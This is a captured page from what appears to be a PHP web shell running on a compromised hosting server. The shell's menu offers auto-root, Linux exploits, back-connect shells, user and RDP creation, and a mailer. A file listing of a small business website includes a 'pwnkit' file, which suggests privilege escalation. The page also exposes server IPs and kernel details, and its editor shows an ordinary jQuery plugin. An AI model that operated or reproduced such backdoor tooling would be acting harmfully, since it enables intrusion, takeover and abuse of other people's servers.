Linux webm008.cluster110.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.110.20.8 | : 216.73.217.1
Cant Read [ /etc/named.conf ]
5.4.45
einst
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
einst /
www_old /
einst4 /
[ HOME SHELL ]
Name
Size
Permission
Action
dat
[ DIR ]
drwx---r-x
gallery
[ DIR ]
drwx---r-x
gfx
[ DIR ]
drwx---r-x
images
[ DIR ]
drwx---r-x
img
[ DIR ]
drwx---r-x
.mad-root
0
B
-rw-r--r--
DD_roundies_0.0.2a.js
16
KB
-rw----r--
akt.js
96
B
-rw----r--
akt_.js
256
B
-rw----r--
einst_tekst_www.rtf
224.77
KB
-rw----r--
gale.php
3.41
KB
-rw----r--
galeria.php
1.64
KB
-rw----r--
glowny.php
1.92
KB
-rw----r--
ie.css
8.73
KB
-rw----r--
index.php
1.69
KB
-rw----r--
jqminmax.js
5.67
KB
-rw----r--
jquery-1.4.2.min.js
70.48
KB
-rw----r--
jquery-ui.min.js
181.87
KB
-rw----r--
jquery.minmax.js
5.22
KB
-rw----r--
kontakt.html
5.87
KB
-rw----r--
kontakt.php
2.63
KB
-rw----r--
licznik.txt
6
B
-rw----r--
logo-l.jpg
19.33
KB
-rw----r--
main.js
1.47
KB
-rw----r--
menu.php
880
B
-rw----r--
menu_.js
792
B
-rw----r--
menu_ie.js
814
B
-rw----r--
nagl.php
1.46
KB
-rw----r--
oferta.php
4.14
KB
-rw----r--
porady.php
3.3
KB
-rw----r--
projekty.php
1.63
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
realizacje.php
3.47
KB
-rw----r--
stronaglowna.php
280
B
-rw----r--
style.css
10.91
KB
-rw----r--
uslugi.php
4.02
KB
-rw----r--
wykonawstwo.php
3.16
KB
-rw----r--
zz_serwis.php
3.59
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.minmax.js
/** * jQMinMax http://davecardwell.co.uk/javascript/jquery/plugins/jquery-minmax/ * * @author Dave Cardwell <http://davecardwell.co.uk/> * @author Karl Swedberg [updated for jQuery 1.3] * @date August 14, 2009 * @version 0.2 * * @projectDescription Add min-/max- height & width support. * * Built on the shoulders of giants: * * John Resig - http://jquery.com/ * * * Copyright (c) 2006 Dave Cardwell, licensed under the MIT License: * * http://www.opensource.org/licenses/mit-license.php */ (function($) { $.minmax = { active: false }; $.support.minmax = false; $(document).ready(function() { // Create a div to test for native minmax support. var test = document.createElement('div'); $(test).css({ 'width': '1px', 'min-width': '2px' }); $('body').append(test); // In compliant browsers, the min-width of 2px should overwrite the // width of 1px. $.support.minmax = ( test.offsetWidth && test.offsetWidth == 2 ); // Tidy up. $(test).remove(); // Go no further if minmax is supported natively. if( $.support.minmax ) return; // Use jQMinMax. $.minmax.active = true; // Set up the minmax jQuery expressions. $.minmax.expressions(); // Use the plugin on all elements where a min/max CSS style is set. $(':minmax').minmax(); }); /** * Set up the minmax jQuery expressions. * * @example $.minmax.expressions(); * * @name $.minmax.expressions * @cat jQMinMax */ $.minmax.expressions = function() { // p for 'properties'. var p = ['min-width', 'min-height', 'max-width', 'max-height' ], pLength = p.length; // test for the given property var testProps = function(el, prop) { var value = $.css(el, prop) != '0px' && $(el).css(prop) != 'auto' && $(el).css(prop) != window.undefined; // max-width / max-height can also have the value 'none'. if (value && prop.charAt(2) == 'x') { value = $(el).css(prop) != 'none'; } return value; }; // add expressions for the individual properties for( var i = 0; i < pLength; i++ ) { (function(thisProp) { $.expr[':'][thisProp] = function(element, index, matches, set) { return testProps(element, thisProp); }; })(p[i]); } // Build and add the ':minmax' expression. $.extend($.expr[':'], { minmax: function(element, index, matches, set) { var val = false; for (var i=0; i<pLength; i++) { val = val || testProps(element, p[i]); } return val; } }); }; /** * Check the given elements for height/width values that fall outside * their min/max constraints and update them appropriately. * * @example $('#foo').minmax(); * * @name $.fn.minmax(); * @cat jQMinMax */ $.fn.minmax = function() { return $(this).each(function() { // Get the min/max constraints of the current element. var constraint = { 'min-width': calculate( this, 'min-width' ), 'max-width': calculate( this, 'max-width' ), 'min-height': calculate( this, 'min-height' ), 'max-height': calculate( this, 'max-height' ) }; // Determine its current width and height. var width = this.offsetWidth; var height = this.offsetHeight; var newWidth = width; var newHeight = height; // If the element is wider than its max-width... if( constraint['max-width'] != window.undefined && newWidth > constraint['max-width'] ) newWidth = constraint['max-width']; // If the element is/is now thinner than its min-width... if( constraint['min-width'] != window.undefined && newWidth < constraint['min-width'] ) newWidth = constraint['min-width']; // If the element is taller than its max-height... if( constraint['max-height'] != window.undefined && newHeight > constraint['max-height'] ) newHeight = constraint['max-height']; // If the element is/is now shorter than its min-height... if( constraint['min-height'] != window.undefined && newHeight < constraint['min-height'] ) newHeight = constraint['min-height']; // Update the proportions of the current element as required. if( newWidth != width ) $(this).css( 'width', newWidth ); if( newHeight != height ) $(this).css( 'height', newHeight ); }); }; // Calculate the computed numeric value of a CSS length value. function calculate( obj, p ) { var raw = $(obj).css( p ); // Nothing in, nothing out. if( raw == window.undefined || raw == 'auto' ) return window.undefined; var result; // Is it a percentage value? result = raw.match(/^\+?(\d*(?:\.\d+)?)%$/); if( result ) { return Math.round( Number( (/width$/.test(p) ? $(obj).parent()[0].offsetWidth : $(obj).parent()[0].offsetHeight ) * result[1] / 100 ) ); } // Is it a straight pixel value? result = raw.match(/^\+?(\d*(?:\.\d+)?)(?:px)?$/); if( result ) { return +result[1]; } // Garbage in, nothing out. return window.undefined; } })(jQuery);
Close